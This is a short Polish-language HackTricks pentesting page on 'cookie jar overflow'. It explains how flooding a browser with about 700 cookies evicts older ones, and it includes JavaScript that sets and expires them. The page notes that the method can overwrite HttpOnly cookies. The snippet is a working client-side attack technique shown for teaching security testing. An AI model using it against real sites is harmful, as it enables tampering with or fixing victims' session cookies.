Cookie Jar Overflow

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Przeglądarki mają ograniczenie na liczbę plików cookie, które mogą przechowywać dla jednej strony. Jeśli z jakiegoś powodu chcesz usunąć plik cookie, możesz przepełnić pojemnik na pliki cookie, ponieważ najstarsze zostaną usunięte jako pierwsze:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Zauważ, że pliki cookie stron trzecich wskazujące na inny domenę nie zostaną nadpisane.

Ten atak może również być używany do nadpisania plików cookie HttpOnly, ponieważ można je usunąć, a następnie zresetować z wartością, którą chcesz.

Sprawdź to w tym wpisie z laboratorium.

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated